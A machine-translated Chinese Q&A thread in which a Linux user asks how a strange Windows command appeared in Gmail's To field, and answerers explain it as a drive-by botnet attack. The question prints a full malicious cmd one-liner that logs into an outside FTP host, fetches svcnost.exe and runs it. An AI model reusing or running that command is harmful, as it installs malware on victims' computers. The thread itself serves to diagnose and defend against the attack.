我的家用电脑通常是开着的,但显示器是关着的。今晚我下班回家,发现看起来像是一次黑客攻击:在我的浏览器中,我的 Gmail 是打开的(那是我),但它处于撰写模式,在该TO字段中包含以下内容:
md /c echo open cCTeamFtp.yi.org 21 >> ik &echo user ccteam10 765824 >> ik &echo binary >> ik &echo get svcnost.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &svcnost.exe &exit echo 您已拥有
对我来说,这看起来像 Windows 命令行代码,并且代码的md开头加上 Gmail 处于撰写模式的事实,很明显有人试图运行cmd命令。我想我很幸运,我实际上没有在这台 PC 上运行 Windows,但我有其他人这样做。这是有史以来第一次这样的事情发生在我身上。我不是 Linux 专家,当时除了 Firefox 之外我没有运行任何其他程序。
我绝对确定这不是我写的,而且没有其他人在我的电脑旁。此外,我最近将我的 Google 密码(以及我的所有其他密码)更改为类似的内容,vMA8ogd7bv因此我不认为有人入侵了我的 Google 帐户。
刚刚发生了什么?当我的计算机不是运行恶意软件多年的老奶奶的旧 Windows 计算机,而是最近安装的新 Ubuntu 时,有人如何在我的计算机上敲击键盘?
更新:
让我解决一些要点和问题:
我真正想知道的是,真正让我感到不安全的是:互联网上的任何人如何在我的机器上生成按键?我怎样才能防止这种情况发生,而不是一头雾水呢?我不是 Linux 极客,我是一个使用 Windows 20 多年并且厌倦了它的父亲。在 18 年多的上网时间中,我个人从未见过任何黑客尝试,所以这对我来说是新的。
Rig*_*uez 66
我怀疑你有什么可担心的。很可能是 JavaScript 攻击试图通过下载来驱动。如果您担心发生这种情况,请开始使用NoScript和AdBlock Plus Firefox 附加组件。
即使访问值得信赖的网站,您也不安全,因为它们运行来自第三方广告商的 JavaScript 代码,这些代码可能是恶意的。
我抓住它并在虚拟机中运行它。它安装了 mirc,这是状态日志... http://pastebin.com/Mn85akMk
这是一种自动攻击,试图让您下载 mIRC 并加入一个僵尸网络,该网络将把您变成垃圾邮件机器人……它让我的 VM 加入并连接到许多不同的远程地址,其中一个是autoemail-119.west320.com.
在 Windows 7 中运行它我必须接受 UAC 提示并允许它通过防火墙访问。
在其他论坛上似乎有大量关于这个确切命令的报告,甚至有人说一个 torrent 文件在下载完成后试图执行它......但我不确定这怎么可能。
我自己没有使用过它,但它应该能够向您显示当前的网络连接,以便您可以查看是否连接到不正常的东西:http : //netactview.sourceforge.net/download.html
Blu*_*eft 42
我同意@jb48394 的观点,它可能是一个 JavaScript 漏洞,就像现在的其他一切一样。
它试图打开一个cmd窗口(参见@torbengb 的评论)并运行恶意命令,而不是仅仅在后台谨慎地下载木马,这一事实表明它利用了 Firefox 中的一些漏洞,允许它输入按键,但是不运行代码。
这也解释了为什么这个明显是专门为 Windows 编写的漏洞也可以在 Linux 中工作:Firefox 在所有操作系统中以相同的方式运行 JavaScript (至少,它试图 :))。如果它是由缓冲区溢出或针对 Windows 的类似漏洞引起的,它就会使程序崩溃。
至于 JavaScript 代码的来源——可能是恶意的谷歌广告(全天在 Gmail 中循环广告)。这会不会 是 在 第一 时间。
She*_*har 12
我在另一台 Linux 机器上发现了类似的攻击。它似乎是 Windows 的某种 FTP 命令。
| 归档时间: |
|
| 查看次数: |
18676 次 |
| 最近记录: |